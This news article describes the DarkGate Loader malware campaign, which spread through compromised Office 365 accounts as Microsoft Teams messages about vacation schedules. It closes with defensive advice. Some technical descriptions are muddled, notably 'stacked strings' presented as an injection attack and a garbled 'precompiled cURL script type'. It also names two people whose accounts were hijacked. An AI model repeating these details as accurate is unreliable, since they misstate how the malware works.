Microsoft Teams Hit by Vacation-themed Phishing Malware

microsoft teams hit by vacation themed phishing malware.jpg Technology

In what is a chilling reminder of the escalating sophistication of cyber threats, hackers are now using malware disguised as innocuous company notifications to compromise systems. The latest phishing scam, named "DarkGate Loader," is designed to infiltrate Microsoft Teams with a seemingly harmless message about "changes to the vacation schedule." However, this innocuous-looking link conceals a .ZIP file loaded with malware, ready to jeopardize your system once accessed.

The DarkGate Loader scam has been under scrutiny by the research team Truesec since late August, revealing an intricate downloading process that makes the malware-laden file hard to identify. The hackers have exploited compromised Office 365 accounts to circulate the malware-infected message via Microsoft Teams. With a crafty SharePoint URL and a precompiled Windows cURL script type, the code is cleverly hidden in plain sight, making it difficult for users to recognize the threat.

New Phishing Scam Targets Microsoft Teams Users

A new sophisticated phishing scam named “DarkGate Loader” is targeting Microsoft Teams users, according to cybersecurity research team Truesec. The malware camouflages itself in an innocuous-looking message about “changes to the vacation schedule.”

The Crafty Camouflage

The scam involves an infected link that, when clicked, leads users to a .ZIP file. Once accessed, the user’s system becomes susceptible to the attached malware. Truesec has been tracking this scam since late August, noting that its complex downloading process makes the file difficult to identify as malicious.

The malware exploit involves a compromised VBScript hidden within a Windows shortcut (LNK). The scam is particularly devious because of its SharePoint URL, making it harder for users to recognize the file as suspicious. Additionally, the precompiled Windows cURL script type obscures the code within the file, further complicating detection.

DarkGate and the Sophos Antivirus

Intriguingly, DarkGate Loader checks if the user has the Sophos antivirus installed. If not, the malware can inject additional code in an attack known as "stacked strings". This opens a shellcode that generates a DarkGate executable, loading it into the system memory.

From Whence it Came

Hackers have used compromised Office 365 accounts to distribute the malware-infected message through Microsoft Teams. Truesec identified some of the accounts commandeered by the hackers, including those of "Akkaravit Tattamanas" and "ABNER DAVID RIVERA ROJAS".

Not the Only Phishing Scam

DarkGate Loader isn’t the only phishing scam that has hit Microsoft Teams this summer. A group of Russian hackers known as Midnight Blizzard used a social engineering exploit to attack around 40 organizations in August, using compromised Microsoft 365 accounts. Microsoft has since addressed the issue, as reported by Windows Central.

A Trend of Attacks

Last fall, business email compromise (BEC) campaigns became a trend. In this type of scam, a malicious actor masquerades as a company boss and sends a seemingly legitimate email chain with instructions for an employee to transfer money. Another infamous exploit was the Windows zero-day vulnerability Follina, discovered last spring, which allowed hackers to access the Microsoft Support Diagnostic Tool commonly associated with Microsoft Office and Word.


As cyber attacks continue to evolve, ensuring the security of digital communication platforms like Microsoft Teams is crucial. Organizations must educate their employees about these threats and implement robust cybersecurity measures. Users should be cautious when clicking on unfamiliar links, even if they appear to come from trusted sources. Constant vigilance and awareness are the first lines of defense against these ever-evolving cyber threats.

Crive - News that matters